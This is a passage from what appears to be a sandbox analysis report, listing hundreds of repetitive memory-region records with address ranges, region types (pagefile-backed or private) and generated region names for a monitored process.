= 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17857 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17858 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17860 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17870 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17871 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17875 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17876 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17884 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17885 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17886 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17887 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17888 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17925 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17926 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17955 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17956 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17957 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17958 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17959 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17960 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17963 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17964 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17966 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17967 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17968 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17969 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17970 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17971 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17972 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17973 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17984 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17985 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17988 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17989 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17993 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17994 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18030 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18031 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18032 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18033 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18034 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 